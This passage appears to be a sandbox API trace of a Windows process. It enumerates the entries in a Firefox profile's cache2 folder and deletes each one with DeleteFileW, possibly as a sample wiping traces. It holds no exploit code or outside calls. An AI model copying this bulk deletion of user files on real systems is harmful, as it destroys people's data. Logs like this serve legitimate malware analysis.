(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3502F57243FBD8F9D25E093A72D603074783A304" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3502f57243fbd8f9d25e093a72d603074783a304")) returned 1 [0253.677] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.677] lstrlenW (lpString="356FCE9F932692DC643481DBA1ABEA937B629F58") returned 40 [0253.677] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="356FCE9F932692DC643481DBA1ABEA937B629F58" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\356FCE9F932692DC643481DBA1ABEA937B629F58") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\356FCE9F932692DC643481DBA1ABEA937B629F58" [0253.677] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\356FCE9F932692DC643481DBA1ABEA937B629F58" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\356fce9f932692dc643481dba1abea937b629f58")) returned 1 [0253.678] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.678] lstrlenW (lpString="35933C361338037A97583E92DA61C299851A9B4E") returned 40 [0253.679] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="35933C361338037A97583E92DA61C299851A9B4E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\35933C361338037A97583E92DA61C299851A9B4E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\35933C361338037A97583E92DA61C299851A9B4E" [0253.679] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\35933C361338037A97583E92DA61C299851A9B4E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\35933c361338037a97583e92da61c299851a9b4e")) returned 1 [0253.680] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.680] lstrlenW (lpString="36A422C04312727A6116F45E357EDA80B3B4A6FD") returned 40 [0253.680] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="36A422C04312727A6116F45E357EDA80B3B4A6FD" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36A422C04312727A6116F45E357EDA80B3B4A6FD") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36A422C04312727A6116F45E357EDA80B3B4A6FD" [0253.680] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36A422C04312727A6116F45E357EDA80B3B4A6FD" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\36a422c04312727a6116f45e357eda80b3b4a6fd")) returned 1 [0253.680] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.680] lstrlenW (lpString="36C5C19636CA8995D6ADCD176668444451854326") returned 40 [0253.680] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="36C5C19636CA8995D6ADCD176668444451854326" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36C5C19636CA8995D6ADCD176668444451854326") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36C5C19636CA8995D6ADCD176668444451854326" [0253.680] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36C5C19636CA8995D6ADCD176668444451854326" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\36c5c19636ca8995d6adcd176668444451854326")) returned 1 [0253.681] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.681] lstrlenW (lpString="36DBE72541419953BE4A8BD61964782F4DBEDECF") returned 40 [0253.681] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="36DBE72541419953BE4A8BD61964782F4DBEDECF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36DBE72541419953BE4A8BD61964782F4DBEDECF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36DBE72541419953BE4A8BD61964782F4DBEDECF" [0253.681] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\36DBE72541419953BE4A8BD61964782F4DBEDECF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\36dbe72541419953be4a8bd61964782f4dbedecf")) returned 1 [0253.681] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.681] lstrlenW (lpString="376ED25A1DE94F0D96E985E5D5CACFCFE3812131") returned 40 [0253.681] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="376ED25A1DE94F0D96E985E5D5CACFCFE3812131" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\376ED25A1DE94F0D96E985E5D5CACFCFE3812131") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\376ED25A1DE94F0D96E985E5D5CACFCFE3812131" [0253.682] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\376ED25A1DE94F0D96E985E5D5CACFCFE3812131" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\376ed25a1de94f0d96e985e5d5cacfcfe3812131")) returned 1 [0253.683] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.683] lstrlenW (lpString="37B0298825F693E093744779A7278E41F1419493") returned 40 [0253.683] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="37B0298825F693E093744779A7278E41F1419493" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B0298825F693E093744779A7278E41F1419493") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B0298825F693E093744779A7278E41F1419493" [0253.683] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B0298825F693E093744779A7278E41F1419493" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\37b0298825f693e093744779a7278e41f1419493")) returned 1 [0253.683] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.683] lstrlenW (lpString="37B4BC98C8FDD6283BE80C5CC385582FEF5D6747") returned 40 [0253.683] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="37B4BC98C8FDD6283BE80C5CC385582FEF5D6747" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B4BC98C8FDD6283BE80C5CC385582FEF5D6747") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B4BC98C8FDD6283BE80C5CC385582FEF5D6747" [0253.683] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37B4BC98C8FDD6283BE80C5CC385582FEF5D6747" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\37b4bc98c8fdd6283be80c5cc385582fef5d6747")) returned 1 [0253.684] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.684] lstrlenW (lpString="37BC32B4B7033C1AB388018EC734B639086C814E") returned 40 [0253.684] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="37BC32B4B7033C1AB388018EC734B639086C814E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37BC32B4B7033C1AB388018EC734B639086C814E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37BC32B4B7033C1AB388018EC734B639086C814E" [0253.684] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\37BC32B4B7033C1AB388018EC734B639086C814E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\37bc32b4b7033c1ab388018ec734b639086c814e")) returned 1 [0253.685] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.685] lstrlenW (lpString="383704E4BB07D527519A7352BA38B681C661FD8F") returned 40 [0253.685] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="383704E4BB07D527519A7352BA38B681C661FD8F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\383704E4BB07D527519A7352BA38B681C661FD8F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\383704E4BB07D527519A7352BA38B681C661FD8F" [0253.685] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\383704E4BB07D527519A7352BA38B681C661FD8F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\383704e4bb07d527519a7352ba38b681c661fd8f")) returned 1 [0253.686] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.687] lstrlenW (lpString="38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115") returned 40 [0253.687] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115" [0253.687] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\38819CF0EDDF28F6C7AE4A62EA2DC0E07EA71115" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\38819cf0eddf28f6c7ae4a62ea2dc0e07ea71115")) returned 1 [0253.688] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.688] lstrlenW (lpString="39CC8AA9054EC6244CA281EEA4BD937517E2861D") returned 40 [0253.688] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="39CC8AA9054EC6244CA281EEA4BD937517E2861D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39CC8AA9054EC6244CA281EEA4BD937517E2861D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39CC8AA9054EC6244CA281EEA4BD937517E2861D" [0253.688] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39CC8AA9054EC6244CA281EEA4BD937517E2861D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\39cc8aa9054ec6244ca281eea4bd937517e2861d")) returned 1 [0253.688] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.689] lstrlenW (lpString="39D606C35C00ADA6E9320E1F6431E5A33EB42182") returned 40 [0253.689] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="39D606C35C00ADA6E9320E1F6431E5A33EB42182" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39D606C35C00ADA6E9320E1F6431E5A33EB42182") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39D606C35C00ADA6E9320E1F6431E5A33EB42182" [0253.689] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\39D606C35C00ADA6E9320E1F6431E5A33EB42182" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\39d606c35c00ada6e9320e1f6431e5a33eb42182")) returned 1 [0253.689] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.689] lstrlenW (lpString="3A554E4EFCC1FAD19E963D27B9A2BF73C9664268") returned 40 [0253.689] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3A554E4EFCC1FAD19E963D27B9A2BF73C9664268" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A554E4EFCC1FAD19E963D27B9A2BF73C9664268") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A554E4EFCC1FAD19E963D27B9A2BF73C9664268" [0253.689] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A554E4EFCC1FAD19E963D27B9A2BF73C9664268" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3a554e4efcc1fad19e963d27b9a2bf73c9664268")) returned 1 [0253.690] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.690] lstrlenW (lpString="3A6C331288F156E9A07E3EA398F3A8FAF0530D8F") returned 40 [0253.690] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3A6C331288F156E9A07E3EA398F3A8FAF0530D8F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A6C331288F156E9A07E3EA398F3A8FAF0530D8F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A6C331288F156E9A07E3EA398F3A8FAF0530D8F" [0253.690] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3A6C331288F156E9A07E3EA398F3A8FAF0530D8F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3a6c331288f156e9a07e3ea398f3a8faf0530d8f")) returned 1 [0253.690] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.690] lstrlenW (lpString="3B3EDC129FE6ED020C044AC637791DEC8B6B7603") returned 40 [0253.690] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3B3EDC129FE6ED020C044AC637791DEC8B6B7603" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3B3EDC129FE6ED020C044AC637791DEC8B6B7603") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3B3EDC129FE6ED020C044AC637791DEC8B6B7603" [0253.691] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3B3EDC129FE6ED020C044AC637791DEC8B6B7603" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3b3edc129fe6ed020c044ac637791dec8b6b7603")) returned 1 [0253.691] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.692] lstrlenW (lpString="3D896079491CA68DD9BB6DB7E612C8DC74463279") returned 40 [0253.692] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3D896079491CA68DD9BB6DB7E612C8DC74463279" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3D896079491CA68DD9BB6DB7E612C8DC74463279") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3D896079491CA68DD9BB6DB7E612C8DC74463279" [0253.692] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3D896079491CA68DD9BB6DB7E612C8DC74463279" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3d896079491ca68dd9bb6db7e612c8dc74463279")) returned 1 [0253.693] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.693] lstrlenW (lpString="3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F") returned 40 [0253.693] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F" [0253.693] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3DE1033D1165F9D849E6DFD8566ABB9179DB1D0F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3de1033d1165f9d849e6dfd8566abb9179db1d0f")) returned 1 [0253.694] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.694] lstrlenW (lpString="3E42820479FADF666581B0704FA4AF901AE0E045") returned 40 [0253.694] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3E42820479FADF666581B0704FA4AF901AE0E045" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3E42820479FADF666581B0704FA4AF901AE0E045") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3E42820479FADF666581B0704FA4AF901AE0E045" [0253.694] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3E42820479FADF666581B0704FA4AF901AE0E045" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3e42820479fadf666581b0704fa4af901ae0e045")) returned 1 [0253.696] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.696] lstrlenW (lpString="3EA580E2FD537915B7084615630F0189274B1F60") returned 40 [0253.696] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3EA580E2FD537915B7084615630F0189274B1F60" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3EA580E2FD537915B7084615630F0189274B1F60") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3EA580E2FD537915B7084615630F0189274B1F60" [0253.696] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3EA580E2FD537915B7084615630F0189274B1F60" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3ea580e2fd537915b7084615630f0189274b1f60")) returned 1 [0253.696] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.696] lstrlenW (lpString="3FAECD8F44CECB41F5586C0DC333275FC173593A") returned 40 [0253.696] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3FAECD8F44CECB41F5586C0DC333275FC173593A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FAECD8F44CECB41F5586C0DC333275FC173593A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FAECD8F44CECB41F5586C0DC333275FC173593A" [0253.696] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FAECD8F44CECB41F5586C0DC333275FC173593A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3faecd8f44cecb41f5586c0dc333275fc173593a")) returned 1 [0253.697] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.697] lstrlenW (lpString="3FB6DE7747DC1B658385638D277CF2D620D232E4") returned 40 [0253.697] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="3FB6DE7747DC1B658385638D277CF2D620D232E4" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FB6DE7747DC1B658385638D277CF2D620D232E4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FB6DE7747DC1B658385638D277CF2D620D232E4" [0253.697] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\3FB6DE7747DC1B658385638D277CF2D620D232E4" (normalized: 